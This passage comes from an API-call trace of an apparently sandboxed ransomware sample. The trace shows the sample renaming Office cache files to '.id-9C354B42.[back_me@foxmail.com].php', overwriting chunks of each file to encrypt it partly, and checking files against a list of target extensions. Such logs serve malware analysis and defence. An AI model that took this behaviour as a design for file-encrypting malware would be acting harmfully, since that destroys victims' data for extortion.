Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0044.385] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0044.385] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0044.385] lstrlenW (lpString=".doc") returned 4 [0044.392] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.392] lstrlenW (lpString=".docx") returned 5 [0044.392] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0044.392] lstrlenW (lpString=".pdf") returned 4 [0044.395] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.399] lstrlenW (lpString=".xls") returned 4 [0044.399] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.408] lstrlenW (lpString=".xlsx") returned 5 [0044.408] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0044.408] lstrlenW (lpString=".ppt") returned 4 [0044.410] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.415] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0044.415] lstrlenW (lpString=".zip") returned 4 [0044.416] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.422] lstrlenW (lpString=".rar") returned 4 [0044.422] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.427] lstrlenW (lpString=".bz2") returned 4 [0044.433] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.433] lstrlenW (lpString=".7z") returned 3 [0044.434] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.434] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0044.440] lstrlenW (lpString=".dbf") returned 4 [0044.441] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.441] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0044.449] lstrlenW (lpString=".1cd") returned 4 [0044.638] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.638] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0044.638] lstrlenW (lpString=".jpg") returned 4 [0044.638] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.638] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0044.638] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0044.638] lstrlenW (lpString=".doc") returned 4 [0044.638] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.638] lstrlenW (lpString=".docx") returned 5 [0044.638] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0044.638] lstrlenW (lpString=".pdf") returned 4 [0044.638] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.638] lstrlenW (lpString=".xls") returned 4 [0044.638] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.638] lstrlenW (lpString=".xlsx") returned 5 [0044.638] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0044.639] lstrlenW (lpString=".ppt") returned 4 [0044.639] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.639] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0044.639] lstrlenW (lpString=".zip") returned 4 [0044.639] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.639] lstrlenW (lpString=".rar") returned 4 [0044.639] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.639] lstrlenW (lpString=".bz2") returned 4 [0044.639] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.639] lstrlenW (lpString=".7z") returned 3 [0044.639] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.639] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0044.639] lstrlenW (lpString=".dbf") returned 4 [0044.639] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.639] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0044.639] lstrlenW (lpString=".1cd") returned 4 [0044.639] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.639] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0044.639] lstrlenW (lpString=".jpg") returned 4 [0044.639] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.639] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0044.639] lstrlenW (lpString="InfLR.cab") returned 9 [0044.639] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.640] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=18874884) returned 1 [0044.640] CloseHandle (hObject=0x1fc) returned 1 [0044.640] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab")) returned 0x2020 [0044.640] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.640] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0044.641] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.641] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0x0) returned 1 [0044.641] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.641] ReadFile (in: hFile=0x1fc, lpBuffer=0x43d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x43d0058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.928] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x6000ac, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.928] ReadFile (in: hFile=0x1fc, lpBuffer=0x4410058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4410058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.936] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.936] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x11c0204, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.936] ReadFile (in: hFile=0x1fc, lpBuffer=0x4450058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4450058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.054] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.054] WriteFile (in: hFile=0x1fc, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x3b0fcb0, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0045.068] SetEndOfFile (hFile=0x1fc) returned 1 [0045.068] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0045.453] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.453] WriteFile (in: hFile=0x1fc, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.455] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x6000ac, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.455] WriteFile (in: hFile=0x1fc, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.458] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x11c0204, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.458] WriteFile (in: hFile=0x1fc, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.461] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0045.461] CloseHandle (hObject=0x1fc) returned 1 [0045.462] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0045.462] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0045.462] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0045.462] lstrlenW (lpString=".doc") returned 4 [0045.462] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.462] lstrlenW (lpString=".docx") returned 5 [0045.462] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0045.462] lstrlenW (lpString=".pdf") returned 4 [0045.462] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.462] lstrlenW (lpString=".xls") returned 4 [0045.462] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.462] lstrlenW (lpString=".xlsx") returned 5 [0045.462] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0045.462] lstrlenW (lpString=".ppt") returned 4 [0045.462] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.462] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0045.462] lstrlenW (lpString=".zip") returned 4 [0045.462] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.462] lstrlenW (lpString=".rar") returned 4 [0045.463] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.463] lstrlenW (lpString=".bz2") returned 4 [0045.463] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.463] lstrlenW (lpString=".7z") returned 3 [0045.463] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.463] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0045.463] lstrlenW (lpString=".dbf") returned 4 [0045.463] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.463] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0045.463] lstrlenW (lpString=".1cd") returned 4 [0045.463] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.463] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0045.463] lstrlenW (lpString=".jpg") returned 4 [0045.463] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.463] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0045.463] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0045.463] lstrlenW (lpString=".doc") returned 4 [0045.463] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.463] lstrlenW (lpString=".docx") returned 5 [0045.463] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0045.463] lstrlenW (lpString=".pdf") returned 4 [0045.463] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.463] lstrlenW (lpString=".xls") returned 4 [0045.463] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.463] lstrlenW (lpString=".xlsx") returned 5 [0045.463] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0045.463] lstrlenW (lpString=".ppt") returned 4 [0045.463] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.463] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0045.463] lstrlenW (lpString=".zip") returned 4 [0045.463] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.463] lstrlenW (lpString=".rar") returned 4 [0045.463] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.464] lstrlenW (lpString=".bz2") returned 4 [0045.464] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.464] lstrlenW (lpString=".7z") returned 3 [0045.464] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.464] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0045.464] lstrlenW (lpString=".dbf") returned 4 [0045.464] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.464] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0045.464] lstrlenW (lpString=".1cd") returned 4 [0045.464] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.464] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0045.464] lstrlenW (lpString=".jpg") returned 4 [0045.464] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.464] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0045.464] lstrlenW (lpString="VisioMUI.msi") returned 12 [0045.464] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0045.464] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=2797568) returned 1 [0045.465] CloseHandle (hObject=0x1fc) returned 1 [0045.465] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi")) returned 0x2020 [0045.465] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0045.465] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0045.465] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0045.465] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0x0) returned 1 [0045.465] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.465] ReadFile (in: hFile=0x1fc, lpBuffer=0x43d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x43d0058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.470] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0xe3aaa, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.470] ReadFile (in: hFile=0x1fc, lpBuffer=0x4410058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4410058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.477] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3b0fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.477] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x26b000, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc2c | out: lpNewFilePointer=0x0) returned 1 [0045.477] ReadFile (in: hFile=0x1fc, lpBuffer=0x4450058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3b0fc38, lpOverlapped=0x0 | out: lpBuffer=0x4450058*, lpNumberOfBytesRead=0x3b0fc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.607] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.607] WriteFile (in: hFile=0x1fc, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x3b0fcb0, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0045.626] SetEndOfFile (hFile=0x1fc) returned 1 [0045.626] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0045.637] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.637] WriteFile (in: hFile=0x1fc, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.639] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0xe3aaa, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.639] WriteFile (in: hFile=0x1fc, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.644] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x26b000, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fc7c | out: lpNewFilePointer=0x0) returned 1 [0045.644] WriteFile (in: hFile=0x1fc, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3b0fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3b0fc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.646] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0045.646] CloseHandle (hObject=0x1fc) returned 1 [0045.646] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0045.646] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0045.646] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0045.646] lstrlenW (lpString=".doc") returned 4 [0045.647] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0045.647] lstrlenW (lpString=".docx") returned 5 [0045.647] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0045.647] lstrlenW (lpString=".pdf") returned 4 [0045.647] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0045.647] lstrlenW (lpString=".xls") returned 4 [0045.647] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0045.647] lstrlenW (lpString=".xlsx") returned 5 [0045.647] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0045.647] lstrlenW (lpString=".ppt") returned 4 [0045.647] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0045.647] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0045.647] lstrlenW (lpString=".zip") returned 4 [0045.647] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0045.647] lstrlenW (lpString=".rar") returned 4 [0045.647] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0045.647] lstrlenW (lpString=".bz2") returned 4 [0045.647] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0045.647] lstrlenW (lpString=".7z") returned 3 [0045.647] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0045.647] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0045.647] lstrlenW (lpString=".dbf") returned 4 [0046.069] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0046.069] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0046.069] lstrlenW (lpString=".1cd") returned 4 [0046.069] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0046.069] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0046.069] lstrlenW (lpString=".jpg") returned 4 [0046.069] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0046.069] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0046.069] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0046.069] lstrlenW (lpString=".doc") returned 4 [0046.069] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0046.069] lstrlenW (lpString=".docx") returned 5 [0046.069] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0046.069] lstrlenW (lpString=".pdf") returned 4 [0046.069] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0046.069] lstrlenW (lpString=".xls") returned 4 [0046.069] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0046.069] lstrlenW (lpString=".xlsx") returned 5 [0046.069] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0046.069] lstrlenW (lpString=".ppt") returned 4 [0046.069] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0046.069] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0046.069] lstrlenW (lpString=".zip") returned 4 [0046.069] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0046.069] lstrlenW (lpString=".rar") returned 4 [0046.070] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0046.070] lstrlenW (lpString=".bz2") returned 4 [0046.070] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0046.070] lstrlenW (lpString=".7z") returned 3 [0046.070] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0046.070] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0046.070] lstrlenW (lpString=".dbf") returned 4 [0046.070] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0046.070] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0046.070] lstrlenW (lpString=".1cd") returned 4 [0046.070] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0046.070] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 75 [0046.070] lstrlenW (lpString=".jpg") returned 4 [0046.070] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0046.070] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0046.070] lstrlenW (lpString="GrooveLR.cab") returned 